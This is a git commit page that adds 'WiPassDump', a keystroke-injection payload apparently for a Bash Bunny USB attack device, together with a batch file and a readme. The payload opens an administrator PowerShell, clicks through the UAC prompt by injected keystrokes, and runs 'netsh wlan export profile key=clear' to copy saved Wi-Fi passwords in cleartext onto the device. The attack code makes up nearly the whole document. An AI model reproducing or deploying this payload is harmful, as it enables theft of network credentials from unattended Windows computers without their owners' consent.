Merge pull request #46 from samdeg555/master

Add WiPassDump payload
2017-03-13 11:03:30 +11:00 · 2017-03-13 11:03:30 +11:00 · e797ad2e93
parent 629a95f858 b0a130f96a
commit e797ad2e93
3 changed files with 88 additions and 0 deletions
--- a/payloads/library/WiPassDump/a.cmd
+++ b/payloads/library/WiPassDump/a.cmd
@ -0,0 +1,6 @@
+REM Go to dump directory
+cd /d %~dp0
+cd ../../loot/WiPassDump/
+
+REM Dump saved Wi-Fi infos
+netsh wlan export profile key=clear
--- a/payloads/library/WiPassDump/payload.txt
+++ b/payloads/library/WiPassDump/payload.txt
@ -0,0 +1,56 @@
+#!/bin/bash
+#
+# Title:         WiPassDump
+# Author:        samdeg555
+# Version:       1.0
+# Target:        Windows
+# 
+# Runs powershell as Administrator
+# Bypasses UAC
+# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny
+#
+
+LED R 200
+
+# Create directory to dump infos
+mkdir -p /root/udisk/loot/WiPassDump
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+# Set language accordingly
+Q SET_LANGUAGE ca
+
+ATTACKMODE HID STORAGE
+
+LED B 200
+
+# Launch powershell as admin
+Q GUI r
+Q DELAY 100
+Q STRING powershell Start-Process powershell -Verb runAs
+Q ENTER
+
+# Bypass UAC
+Q DELAY 3000
+Q ALT o
+Q ENTER
+Q DELAY 500
+
+# Start a.cmd
+Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/'
+Q STRING $SWITCH_POSITION
+Q STRING '/a.cmd'"'"')'
+Q ENTER
+
+# Wait for a.cmd to finish and exit
+
+LED R B 500
+
+Q DELAY 3000
+Q STRING exit
+Q ENTER
+
+sync
+
+LED G
--- a/payloads/library/WiPassDump/readme.md
+++ b/payloads/library/WiPassDump/readme.md
@ -0,0 +1,26 @@
+# WiPassDump for Bash Bunnys
+
+* Author: samdeg555
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Dumps saved Wi-Fi infos including clear text passwords to the bash bunny
+Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder.
+
+## Configuration
+
+None needed. 
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Red (blinking)     | Setting up                                   |
+| Blue (blinking)    | Attack running                               |
+| Purple (blinking)  | Almost done (cleaning up)                    |
+| Green              | Attack Complete                              |
+
+## Discussion
+None yet.